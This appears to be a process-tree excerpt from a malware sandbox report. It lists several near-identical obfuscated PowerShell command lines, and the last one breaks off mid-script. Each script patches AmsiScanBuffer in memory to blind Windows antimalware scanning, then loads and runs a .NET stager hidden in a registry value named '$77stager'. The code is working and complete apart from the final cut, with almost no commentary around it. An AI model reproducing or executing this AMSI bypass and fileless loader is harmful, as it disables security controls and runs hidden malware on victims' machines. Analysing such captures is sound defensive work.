C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:IwuVdeLYNGui{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$bcmzPNVBQBhpHG,[Parameter(Position=1)][Type]$rabxnCFAnd)$NxhASLebzYb=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'ef'+[Char](108)+''+'e'+''+'c'+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+'D'+''+[Char](101)+''+[Char](108)+'e'+[Char](103)+''+'a'+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+'M'+'e'+''+[Char](109)+''+[Char](111)+''+[Char](114)+'y'+'M'+'o'+[Char](100)+''+[Char](117)+'l'+[Char](101)+'',$False).DefineType(''+'M'+'yD'+[Char](101)+''+[Char](108)+'e'+'g'+'a'+'t'+'e'+'T'+''+[Char](121)+'pe',''+[Char](67)+''+'l'+'a'+[Char](115)+''+'s'+','+[Char](80)+'u'+'b'+''+'l'+''+[Char](105)+''+[Char](99)+','+[Char](83)+''+[Char](101)+''+[Char](97)+'l'+[Char](101)+''+[Char](100)+''+[Char](44)+'An'+[Char](115)+''+[Char](105)+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+','+[Char](65)+''+[Char](117)+'t'+[Char](111)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+'s'+'s',[MulticastDelegate]);$NxhASLebzYb.DefineConstructor(''+'R'+''+[Char](84)+''+[Char](83)+''+[Char](112)+'ec'+[Char](105)+''+[Char](97)+'l'+'N'+'am'+[Char](101)+''+[Char](44)+''+[Char](72)+'i'+[Char](100)+''+'e'+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+','+'P'+''+[Char](117)+'b'+[Char](108)+''+'i'+'c',[Reflection.CallingConventions]::Standard,$bcmzPNVBQBhpHG).SetImplementationFlags(''+'R'+'u'+[Char](110)+''+[Char](116)+''+[Char](105)+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+'g'+'e'+[Char](100)+'');$NxhASLebzYb.DefineMethod(''+[Char](73)+''+'n'+'v'+[Char](111)+'ke',''+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+',H'+[Char](105)+''+[Char](100)+'e'+'B'+''+'y'+''+'S'+''+[Char](105)+''+'g'+''+','+''+'N'+'e'+[Char](119)+''+[Char](83)+''+'l'+''+[Char](111)+'t'+[Char](44)+''+[Char](86)+''+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+''+'a'+''+[Char](108)+'',$rabxnCFAnd,$bcmzPNVBQBhpHG).SetImplementationFlags(''+[Char](82)+''+'u'+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+','+[Char](77)+''+[Char](97)+''+'n'+''+'a'+'g'+[Char](101)+'d');Write-Output $NxhASLebzYb.CreateType();}$HZuaIZXbblguG=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+'y'+''+[Char](115)+''+[Char](116)+''+'e'+''+'m'+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')}).GetType(''+'M'+''+'i'+''+[Char](99)+'r'+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+'n'+'3'+'2.'+[Char](85)+'n'+[Char](115)+'a'+[Char](102)+''+[Char](101)+'Na'+'t'+''+'i'+''+[Char](118)+'e'+'M'+''+[Char](101)+''+[Char](116)+'h'+[Char](111)+''+[Char](100)+''+[Char](115)+'');$SSaPUngQnXLGUh=$HZuaIZXbblguG.GetMethod('Ge'+[Char](116)+'Pr'+'o'+''+[Char](99)+''+'A'+''+'d'+''+'d'+''+[Char](114)+''+[Char](101)+''+'s'+'s',[Reflection.BindingFlags](''+[Char](80)+'u'+'b'+'l'+[Char](105)+'c,'+[Char](83)+''+[Char](116)+'a'+'t'+''+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$samoMuOHitzzSSvjkpC=IwuVdeLYNGui @([String])([IntPtr]);$zRcmVbIcqHutSvNfmbGkzB=IwuVdeLYNGui @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$SoenozJgnYU=$HZuaIZXbblguG.GetMethod(''+[Char](71)+'e'+[Char](116)+''+'M'+''+[Char](111)+''+[Char](100)+''+'u'+'l'+'e'+''+'H'+''+'a'+''+[Char](110)+'dl'+'e'+'').Invoke($Null,@([Object]('k'+'e'+''+[Char](114)+'n'+'e'+''+'l'+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](100)+''+[Char](108)+'l')));$fLDDBbezKndMzW=$SSaPUngQnXLGUh.Invoke($Null,@([Object]$SoenozJgnYU,[Object]('L'+[Char](111)+''+[Char](97)+''+[Char](100)+''+[Char](76)+''+'i'+''+'b'+'ra'+'r'+''+[Char](121)+''+'A'+'')));$zQFDvPLlxFeBeVkou=$SSaPUngQnXLGUh.Invoke($Null,@([Object]$SoenozJgnYU,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+'u'+''+[Char](97)+'l'+[Char](80)+''+[Char](114)+''+'o'+''+'t'+'e'+'c'+''+[Char](116)+'')));$DGTXFPT=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($fLDDBbezKndMzW,$samoMuOHitzzSSvjkpC).Invoke('a'+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](46)+''+[Char](100)+''+'l'+''+'l'+'');$inQnIdjOUuwANKBVC=$SSaPUngQnXLGUh.Invoke($Null,@([Object]$DGTXFPT,[Object]('A'+[Char](109)+''+'s'+''+'i'+'S'+[Char](99)+''+'a'+''+[Char](110)+'B'+'u'+''+[Char](102)+''+[Char](102)+''+[Char](101)+'r')));$eiQwJRGeCO=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($zQFDvPLlxFeBeVkou,$zRcmVbIcqHutSvNfmbGkzB).Invoke($inQnIdjOUuwANKBVC,[uint32]8,4,[ref]$eiQwJRGeCO);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$inQnIdjOUuwANKBVC,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($zQFDvPLlxFeBeVkou,$zRcmVbIcqHutSvNfmbGkzB).Invoke($inQnIdjOUuwANKBVC,[uint32]8,0x20,[ref]$eiQwJRGeCO);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+'F'+'TW'+[Char](65)+''+'R'+''+[Char](69)+'').GetValue(''+[Char](36)+''+[Char](55)+''+[Char](55)+''+[Char](115)+''+[Char](116)+''+'a'+'g'+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:fvceSEIvAFyP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$OZEkVCtZLIXald,[Parameter(Position=1)][Type]$cWfICIMPml)$IBmpNvaWopO=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+'ted'+'D'+''+'e'+'le'+[Char](103)+'at'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+''+'M'+''+[Char](101)+'m'+'o'+''+[Char](114)+'y'+'M'+'o'+[Char](100)+'ule',$False).DefineType(''+[Char](77)+''+[Char](121)+'D'+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+'a'+''+'t'+''+'e'+''+'T'+''+[Char](121)+''+[Char](112)+'e',''+[Char](67)+''+'l'+'a'+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+''+[Char](117)+'b'+[Char](108)+'ic'+[Char](44)+'S'+[Char](101)+''+[Char](97)+'l'+'e'+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+'C'+''+[Char](108)+'a'+[Char](115)+''+'s'+''+[Char](44)+''+[Char](65)+''+'u'+''+[Char](116)+''+[Char](111)+''+[Char](67)+''+[Char](108)+'a'+'s'+''+'s'+'',[MulticastDelegate]);$IBmpNvaWopO.DefineConstructor(''+[Char](82)+''+'T'+'Sp'+'e'+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+'a'+''+[Char](109)+'e'+[Char](44)+'H'+'i'+'d'+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+','+'P'+''+[Char](117)+''+'b'+''+'l'+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$OZEkVCtZLIXald).SetImplementationFlags(''+[Char](82)+''+'u'+'n'+[Char](116)+'i'+[Char](109)+'e,'+[Char](77)+'a'+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+'d');$IBmpNvaWopO.DefineMethod(''+'I'+''+[Char](110)+''+[Char](118)+''+[Char](111)+'k'+[Char](101)+'',''+'P'+''+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+'H'+''+[Char](105)+''+[Char](100)+'eB'+'y'+'Sig,N'+[Char](101)+''+'w'+'S'+[Char](108)+''+[Char](111)+'t'+','+'Vi'+[Char](114)+'t'+'u'+''+'a'+''+[Char](108)+'',$cWfICIMPml,$OZEkVCtZLIXald).SetImplementationFlags(''+[Char](82)+'u'+'n'+''+[Char](116)+''+'i'+'me'+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+'g'+'e'+'d');Write-Output $IBmpNvaWopO.CreateType();}$JLMYHIDXJxcwq=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+'s'+[Char](116)+'em'+[Char](46)+'d'+'l'+''+[Char](108)+'')}).GetType('Mi'+[Char](99)+'r'+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+''+[Char](116)+''+'.'+''+[Char](87)+''+'i'+'n'+'3'+''+[Char](50)+'.'+[Char](85)+''+'n'+''+'s'+''+[Char](97)+'f'+[Char](101)+'N'+[Char](97)+'ti'+[Char](118)+''+[Char](101)+''+'M'+'e'+'t'+'h'+[Char](111)+'d'+'s'+'');$NrRgKooUotNwBy=$JLMYHIDXJxcwq.GetMethod(''+'G'+''+[Char](101)+'t'+'P'+''+'r'+''+[Char](111)+''+[Char](99)+''+[Char](65)+''+'d'+''+[Char](100)+''+[Char](114)+''+[Char](101)+'s'+'s'+'',[Reflection.BindingFlags](''+[Char](80)+'ub'+[Char](108)+''+'i'+'c'+[Char](44)+''+[Char](83)+''+[Char](116)+'ati'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$rjYsWPyGcZtoERryHCk=fvceSEIvAFyP @([String])([IntPtr]);$jKtixEEzqIrVqraSvcUBnZ=fvceSEIvAFyP @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$aptrrqJxILh=$JLMYHIDXJxcwq.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+'M'+''+[Char](111)+'d'+'u'+''+[Char](108)+''+[Char](101)+''+[Char](72)+''+[Char](97)+''+[Char](110)+''+[Char](100)+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+'r'+'n'+'e'+''+'l'+''+[Char](51)+'2'+'.'+''+'d'+'ll')));$aXgvHusGeonSHl=$NrRgKooUotNwBy.Invoke($Null,@([Object]$aptrrqJxILh,[Object](''+'L'+''+[Char](111)+'a'+'d'+''+[Char](76)+'i'+[Char](98)+''+'r'+''+[Char](97)+'r'+[Char](121)+''+[Char](65)+'')));$NuQeGXurvWFcRKwCy=$NrRgKooUotNwBy.Invoke($Null,@([Object]$aptrrqJxILh,[Object](''+'V'+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+'u'+''+'a'+''+'l'+'P'+'r'+'o'+'t'+''+[Char](101)+''+'c'+'t')));$iOZCSoM=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($aXgvHusGeonSHl,$rjYsWPyGcZtoERryHCk).Invoke('am'+[Char](115)+''+[Char](105)+''+[Char](46)+''+[Char](100)+''+'l'+''+'l'+'');$yetHyPJMfCMQoIwmM=$NrRgKooUotNwBy.Invoke($Null,@([Object]$iOZCSoM,[Object](''+[Char](65)+''+[Char](109)+'s'+[Char](105)+''+[Char](83)+''+'c'+''+[Char](97)+''+[Char](110)+''+[Char](66)+''+[Char](117)+''+[Char](102)+'fe'+[Char](114)+'')));$KahQgEeXDc=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NuQeGXurvWFcRKwCy,$jKtixEEzqIrVqraSvcUBnZ).Invoke($yetHyPJMfCMQoIwmM,[uint32]8,4,[ref]$KahQgEeXDc);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$yetHyPJMfCMQoIwmM,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NuQeGXurvWFcRKwCy,$jKtixEEzqIrVqraSvcUBnZ).Invoke($yetHyPJMfCMQoIwmM,[uint32]8,0x20,[ref]$KahQgEeXDc);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+[Char](70)+''+[Char](84)+''+'W'+''+[Char](65)+''+[Char](82)+''+'E'+'').GetValue(''+[Char](36)+'77'+'s'+''+'t'+''+[Char](97)+''+[Char](103)+'er')).EntryPoint.Invoke($Null,$Null)"2⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:XRQGroDksgTy{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$wcbylcsIgOXdfJ,[Parameter(Position=1)][Type]$uVuwhbFqPu)$YJVXgqanMvG=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+'l'+''+[Char](101)+''+'c'+''+'t'+''+[Char](101)+''+[Char](100)+'Del'+'e'+''+[Char](103)+''+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'n'+[Char](77)+''+[Char](101)+''+[Char](109)+''+'o'+''+[Char](114)+'y'+[Char](77)+'od'+[Char](117)+''+'l'+''+'e'+'',$False).DefineType(''+'M'+''+'y'+'D'+[Char](101)+''+'l'+'e'+[Char](103)+''+[Char](97)+'t'+[Char](101)+''+[Char](84)+'y'+'p'+''+[Char](101)+'',''+'C'+'l'+'a'+''+[Char](115)+'s'+[Char](44)+''+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+','+[Char](83)+''+[Char](101)+''+[Char](97)+''+[Char](108)+'e'+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+'s'+'i'+'C'+'l'+''+[Char](97)+''+'s'+''+[Char](115)+''+','+''+[Char](65)+''+'u'+''+'t'+''+'o'+''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$YJVXgqanMvG.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+[Char](112)+'e'+[Char](99)+''+'i'+'al'+[Char](78)+'am'+'e'+''+[Char](44)+''+'H'+''+'i'+'d'+[Char](101)+''+[Char](66)+''+'y'+'S'+'i'+''+[Char](103)+''+[Char](44)+''+'P'+''+[Char](117)+'b'+'l'+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$wcbylcsIgOXdfJ).SetImplementationFlags(''+[Char](82)+'un'+[Char](116)+'i'+[Char](109)+'e'+','+''+'M'+''+[Char](97)+'n'+[Char](97)+'g'+'e'+'d');$YJVXgqanMvG.DefineMethod(''+'I'+'n'+[Char](118)+''+[Char](111)+'k'+'e'+'','P'+[Char](117)+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+[Char](105)+'d'+'e'+'B'+'y'+''+'S'+''+[Char](105)+''+'g'+''+','+'N'+[Char](101)+''+[Char](119)+''+'S'+'l'+[Char](111)+''+[Char](116)+''+[Char](44)+'V'+[Char](105)+''+'r'+'t'+[Char](117)+''+'a'+''+[Char](108)+'',$uVuwhbFqPu,$wcbylcsIgOXdfJ).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+[Char](116)+'i'+'m'+''+'e'+''+[Char](44)+''+'M'+'a'+'n'+''+[Char](97)+''+[Char](103)+'e'+[Char](100)+'');Write-Output $YJVXgqanMvG.CreateType();}$rlWarRZRppCQV=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+'y'+''+[Char](115)+''+'t'+''+'e'+''+[Char](109)+'.dl'+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+'r'+[Char](111)+''+'s'+'o'+[Char](102)+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+'n32'+[Char](46)+''+[Char](85)+'n'+[Char](115)+''+[Char](97)+''+'f'+'e'+[Char](78)+'at'+[Char](105)+'v'+[Char](101)+''+'M'+''+[Char](101)+''+'t'+''+'h'+''+[Char](111)+''+'d'+''+[Char](115)+'');$kyoTkXDcosWZMk=$rlWarRZRppCQV.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+[Char](114)+''+'o'+''+[Char](99)+'A'+[Char](100)+''+'d'+''+'r'+''+'e'+''+[Char](115)+'s',[Reflection.BindingFlags](''+[Char](80)+'u'+'b'+'l'+'i'+'c'+[Char](44)+''+'S'+''+[Char](116)+''+'a'+''+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$EakTzWslJUUBosZBgkJ=XRQGroDksgTy @([String])([IntPtr]);$kyyFueixtDrPWDknKEUXnb=XRQGroDksgTy @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$xNhxydrufAt=$rlWarRZRppCQV.GetMethod(''+[Char](71)+'etMo'+'d'+''+'u'+'l'+[Char](101)+'H'+[Char](97)+''+[Char](110)+''+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object]('ke'+[Char](114)+''+[Char](110)+'el'+'3'+'2.'+[Char](100)+'l'+'l'+'')));$QgrMNwgqPItLTH=$kyoTkXDcosWZMk.Invoke($Null,@([Object]$xNhxydrufAt,[Object](''+[Char](76)+''+'o'+''+'a'+''+[Char](100)+''+[Char](76)+''+[Char](105)+''+[Char](98)+''+[Char](114)+'a'+'r'+''+'y'+''+[Char](65)+'')));$uUhZhETtfxMmoglCl=$kyoTkXDcosWZMk.Invoke($Null,@([Object]$xNhxydrufAt,[Object](''+'V'+''+'i'+''+[Char](114)+'tualP'+[Char](114)+''+'o'+''+'t'+''+'e'+''+[Char](99)+''+[Char](116)+'')));$NXsQAXK=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($QgrMNwgqPItLTH,$EakTzWslJUUBosZBgkJ).Invoke('am'+'s'+''+'i'+''+[Char](46)+''+'d'+'l'+[Char](108)+'');$EsqWMnqxJrExPfGrd=$kyoTkXDcosWZMk.Invoke($Null,@([Object]$NXsQAXK,[Object](''+[Char](65)+'m'+'s'+''+'i'+''+[Char](83)+''+[Char](99)+'a'+[Char](110)+''+[Char](66)+''+[Char](117)+''+'f'+'f'+[Char](101)+'r')));$HhZmFenuIX=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($uUhZhETtfxMmoglCl,$kyyFueixtDrPWDknKEUXnb).Invoke($EsqWMnqxJrExPfGrd,[uint32]8,4,[ref]$HhZmFenuIX);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$EsqWMnqxJrExPfGrd,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($uUhZhETtfxMmoglCl,$kyyFueixtDrPWDknKEUXnb).Invoke($EsqWMnqxJrExPfGrd,[uint32]8,0x20,[ref]$HhZmFenuIX);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+'T'+'W'+''+'A'+''+[Char](82)+''+[Char](69)+'').GetValue(''+'$'+''+'7'+'7'+[Char](115)+'ta'+[Char](103)+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"2⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:EGOIAxiURPQd{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$swTEDoYvoYdqYe,[Parameter(Position=1)][Type]$QsWHNStbzU)$rzhFZFMLhLu=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+'f'+[Char](108)+''+[Char](101)+''+'c'+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+'a'+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+''+'e'+''+[Char](109)+''+[Char](111)+''+'r'+'y'+[Char](77)+''+[Char](111)+''+'d'+''+[Char](117)+''+[Char](108)+'e',$False).DefineType(''+'M'+'y'+'D'+'e'+[Char](108)+'eg'+[Char](97)+''+[Char](116)+''+'e'+'Ty'+[Char](112)+'e',''+[Char](67)+''+[Char](108)+''+'a'+''+'s'+''+'s'+''+','+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c,'+'S'+''+[Char](101)+''+[Char](97)+''+[Char](108)+'e'+'d'+','+[Char](65)+''+[Char](110)+''+'s'+''+[Char](105)+''+'C'+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+','+''+'A'+'ut'+[Char](111)+''+'C'+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$rzhFZFMLhLu.DefineConstructor('R'+'T'+'S'+'p'+''+[Char](101)+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+'l'+''+[Char](78)+''+'a'+''+[Char](109)+''+'e'+''+[Char](44)+''+[Char](72)+'i'+[Char](100)+''+'e'+'B'+'y'+'S'+[Char](105)+''+'g'+''+','+''+[Char](80)+''+[Char](117)+'bli'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$swTEDoYvoYdqYe).SetImplementationFlags('R'+[Char](117)+''+'n'+'t'+'i'+''+[Char](109)+''+[Char](101)+''+','+'M'+[Char](97)+'n'+'a'+''+'g'+''+[Char](101)+''+[Char](100)+'');$rzhFZFMLhLu.DefineMethod(''+[Char](73)+'n'+[Char](118)+'o'+[Char](107)+''+[Char](101)+'',''+[Char](80)+'u'+[Char](98)+'l'+[Char](105)+'c'+[Char](44)+''+'H'+''+[Char](105)+''+'d'+''+'e'+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+''+[Char](78)+''+'e'+''+[Char](119)+''+[Char](83)+''+[Char](108)+''+'o'+''+[Char](116)+''+[Char](44)+''+'V'+''+[Char](105)+''+[Char](114)+''+'t'+''+'u'+'a'+[Char](108)+'',$QsWHNStbzU,$swTEDoYvoYdqYe).SetImplementationFlags(''+'R'+''+[Char](117)+'n'+[Char](116)+''+[Char](105)+''+[Char](109)+''+'e'+''+[Char](44)+''+[Char](77)+''+[Char](97)+'n'+'a'+''+'g'+''+[Char](101)+''+'d'+'');Write-Output $rzhFZFMLhLu.CreateType();}$gyXFhLLlCmotd=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+'t'+[Char](101)+'m.'+[Char](100)+''+'l'+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+'r'+''+[Char](111)+''+[Char](115)+''+'o'+''+'f'+'t.'+[Char](87)+'in'+[Char](51)+''+'2'+''+'.'+'U'+[Char](110)+''+[Char](115)+''+'a'+''+'f'+''+'e'+''+'N'+''+[Char](97)+''+'t'+'iv'+[Char](101)+''+[Char](77)+'e'+[Char](116)+'h'+[Char](111)+''+'d'+''+[Char](115)+'');$KWdxYPlsbwZkBz=$gyXFhLLlCmotd.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+[Char](80)+''+[Char](114)+'ocA'+[Char](100)+'d'+[Char](114)+'e'+[Char](115)+'s',[Reflection.BindingFlags](''+[Char](80)+'u'+[Char](98)+'l'+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+'ta'+[Char](116)+''+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$ZDrwWjKXOxANFevXdZR=EGOIAxiURPQd @([String])([IntPtr]);$xlMRSbvOeGleRrvnpsJHnK=EGOIAxiURPQd @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$cxglezlhUlY=$gyXFhLLlCmotd.GetMethod('G'+[Char](101)+''+'t'+'M'+[Char](111)+''+[Char](100)+'u'+'l'+''+'e'+''+[Char](72)+''+[Char](97)+''+[Char](110)+'d'+[Char](108)+'e').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+''+[Char](110)+''+'e'+''+[Char](108)+''+[Char](51)+''+[Char](50)+'.'+'d'+''+'l'+''+[Char](108)+'')));$AfHbuYDJGPHTaO=$KWdxYPlsbwZkBz.Invoke($Null,@([Object]$cxglezlhUlY,[Object](''+'L'+''+'o'+'a'+[Char](100)+''+[Char](76)+''+[Char](105)+''+[Char](98)+''+[Char](114)+''+'a'+''+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$BIgFuUbHsPsRJwPOY=$KWdxYPlsbwZkBz.Invoke($Null,@([Object]$cxglezlhUlY,[Object](''+'V'+''+'i'+''+[Char](114)+''+[Char](116)+''+'u'+''+[Char](97)+''+[Char](108)+'P'+'r'+'o'+[Char](116)+'e'+[Char](99)+'t')));$fSZcdXJ=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($AfHbuYDJGPHTaO,$ZDrwWjKXOxANFevXdZR).Invoke(''+[Char](97)+''+[Char](109)+''+'s'+''+'i'+''+'.'+''+'d'+''+'l'+''+[Char](108)+'');$XYmsOzerkOCOWGrBl=$KWdxYPlsbwZkBz.Invoke($Null,@([Object]$fSZcdXJ,[Object]('A'+'m'+''+[Char](115)+''+[Char](105)+'S'+[Char](99)+''+[Char](97)+''+'n'+'B'+[Char](117)+''+'f'+'fe'+[Char](114)+'')));$RQMDWeWQeN=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BIgFuUbHsPsRJwPOY,$xlMRSbvOeGleRrvnpsJHnK).Invoke($XYmsOzerkOCOWGrBl,[uint32]8,4,[ref]$RQMDWeWQeN);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$XYmsOzerkOCOWGrBl,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BIgFuUbHsPsRJwPOY,$xlMRSbvOeGleRrvnpsJHnK).Invoke($XYmsOzerkOCOWGrBl,[uint32]8,0x20,[ref]$RQMDWeWQeN);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+[Char](70)+''+[Char](84)+''+[Char](87)+''+[Char](65)+''+[Char](82)+''+'E'+'').GetValue(''+[Char](36)+''+'7'+''+[Char](55)+''+[Char](115)+''+'t'+''+'a'+''+[Char](103)+'er')).EntryPoint.Invoke($Null,$Null)"2⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:OZnFXzkJJltn{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$eJVNHvbiwWGLTc,[Parameter(Position=1)][Type]$BFGyEKagfU)$imfAZtLOgfx=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object 